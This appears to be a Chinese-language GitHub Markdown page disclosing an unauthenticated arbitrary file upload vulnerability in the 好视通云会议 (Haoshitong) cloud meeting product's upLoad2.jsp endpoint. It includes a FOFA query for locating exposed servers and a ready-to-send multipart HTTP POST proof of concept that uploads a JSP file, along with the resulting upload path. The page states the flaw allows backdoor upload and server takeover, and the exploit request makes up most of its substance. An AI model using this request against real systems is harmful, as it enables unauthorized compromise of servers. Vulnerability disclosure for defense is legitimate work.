好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞

好视通云会议/fm/systemConfig/upLoad2.jsp接口处存在任意文件上传漏洞，未经身份认证的攻击者可以通过此漏洞上传恶意后门文件，最终可获取服务器权限。

fofa

app:"好视通-云会议"

poc

POST /fm/systemConfig/upLoad2.jsp HTTP/1.1
Content-Type: multipart/form-data; boundary=1515df1sdfdsfddfs
Accept-Encoding: gzip
 
--1515df1sdfdsfddfs
Content-Disposition: form-data; name="file"; filename="dudesuite.jsp"
Content-Type: application/octet-stream
 
<% out.print("dudesuite"); %>
--1515df1sdfdsfddfs--

文件路径/fm/upload/dudesuite.jsp

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md

好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md

好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞

fofa

poc

Files

好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md

Latest commit

History

好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md

File metadata and controls

好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞

fofa

poc